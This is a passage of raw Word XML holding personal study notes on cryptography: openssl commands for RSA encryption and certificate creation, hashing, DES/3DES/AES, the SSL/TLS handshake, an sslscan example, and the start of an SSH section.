        <w:t xml:space="preserve"> -in text.txt -out encrypted.txt</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1" w:rsidRPr="00AC76F1">
        <w:t>encrypts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00AC76F1" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rsautl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -decrypt -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>inkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>private.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -in encrypted.txt -out plaintext.txt</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1" w:rsidRPr="00AC76F1">
        <w:t>decrypts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> text.txt plaintext.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- this checks for any differences between the 2 text documents.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Public Key Cryptography </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Overview. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uses key pairs. One private key and one public keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> send a message to Neshy, </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would use her public key to encrypt my message which only her private key could decrypt</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve"> correctly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">X.509 certificate can be used to digitally sign a document. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Uses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a Certificate Authority, CA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PGP, Pretty Good Privacy, also implements Public Key Cryptography in a different way. Uses a web of trust model which means that </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> post my public key to a public key repository. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Anybody</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> who knows me can sign my public key with their key to confirm it's me. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Cryptography Certificate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Certificate says who </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> really am, like a passport. Allow</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>s me to encrypt messages also. HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uses certificates. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>genrsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -des3 out </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ca.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 4096</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- Generate a private key for a certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00AC76F1" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> pass phrase for key: DAI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>req</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -new -x509 -days 365 -key </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ca.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -out ca.crt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>--Generate a certificate using your private key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> x509 -text -in ca.crt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- To see your CA Certificate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The certifi</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>cate also contains a hash algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to ensure what's received is what was sent. </w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>This provides n</w:t>
      </w:r>
      <w:r>
        <w:t>on-repudiation</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve"> from the sender</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve"> They cannot deny it came from them.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00AC76F1" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The C</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>ertificate Author</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ity manages certificates. </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>Trusted CAs will be saved in the browser so any website you visit that has a certificate from any of the trusted CAs will automatically be trusted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When you visit a website that doesn't have a certificate from a trusted CA that's when you have to confirm you want to visit that site and accept their certificate. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Cryptographic Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hashing generates a fixed length output. MD5 provides a different length value than SHA1. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>It's a one-way system. The data is not meant to be rec</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>overed. Its main use is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to check file integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC76F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>md5sum ca.crt</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- provides the md5 hash of ca.crt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC76F1" w:rsidRDefault="00AC76F1" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Passwords</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> are often hashed for storage so they're not stored in plaintext. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To hack this the correct pas</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>sword isn't need to be know, t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> needs to find a string of characters that produces the same hash value as the password thereby gaining access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Different Types of Cryptographic Ciphers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve">ational </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t xml:space="preserve">ecurity </w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00AC76F1">
        <w:t>gency, NSA,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requested changes to cipher, did they ever put a backdoor into the encryption standard??!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - 56bit keys, block cipher, uses 64 bit blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In 1998 it was cracked in under 3 days. In 1999 it took a network of 10,000 computers less than a day to crack a message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3DES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t xml:space="preserve">uses </w:t>
      </w:r>
      <w:r>
        <w:t>3 56bit keys - 168bits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Key1 is used to encrypt a message (P) resulting in C1 cipher text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Key2 is used to decrypt C1 resulting in C2 cipher text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Key3 is used to encrypt C2 resulting in C3 cipher text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>encrypt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - decrypt - encrypt process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00302608" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> published in 2001 by NIST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rijndael</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. It has v</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>ariable</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> block sizes and key lengths, multiples of 32 bits. AES specifies a fixed 128 bit block size but key lengths of 129, 192 and 256 bits. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**S</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t xml:space="preserve">ecure </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t xml:space="preserve">ocket </w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>ayer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &amp; T</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t xml:space="preserve">ransport </w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t xml:space="preserve">ayer </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>ecurity – SSL &amp; TLS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ways of doing encryption between websites and webservers and cl</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>ents or browsers.</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> Developed by Netscape, became M</w:t>
      </w:r>
      <w:r>
        <w:t>ozilla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V2 of SSL encryption between webserver and a browser. Full of vulnerabilities. Released V3.0 in 1996 but still had some issues. In 1999 we end up with TLS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Client Hello going out to the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Server responds with hello</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>They</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> exchange information including cipher suites it supports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>responds</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> with what cipher it wants to use</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Client key exchange happens</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Encrypted handshake message is complete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sslscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00302608" w:rsidRPr="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>www.infinitelabs.com</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">--detects what </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> version is being used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Brings up loads of information about what encryption and hash is being used. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**S</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t xml:space="preserve">ecure </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>hell - SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">More secure replacement for Telnet. Telnet was always plaintext. </w:t>
      </w:r>
      <w:r w:rsidR="00302608">
        <w:t>SSH is encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302608" w:rsidRDefault="00302608" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>For password less login over SSH:</w:t>
